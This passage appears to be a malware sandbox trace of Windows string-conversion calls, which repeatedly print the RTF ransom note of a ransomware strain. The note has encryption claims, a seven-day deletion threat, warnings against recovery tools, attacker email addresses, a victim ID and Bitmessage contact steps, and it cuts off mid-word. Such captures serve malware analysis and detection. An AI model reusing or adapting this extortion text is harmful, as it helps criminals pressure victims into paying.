\\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0218.018] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2470908, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 